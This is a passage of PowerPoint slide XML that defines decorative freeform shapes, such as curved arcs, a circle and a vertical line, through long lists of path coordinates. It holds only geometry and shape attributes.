                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
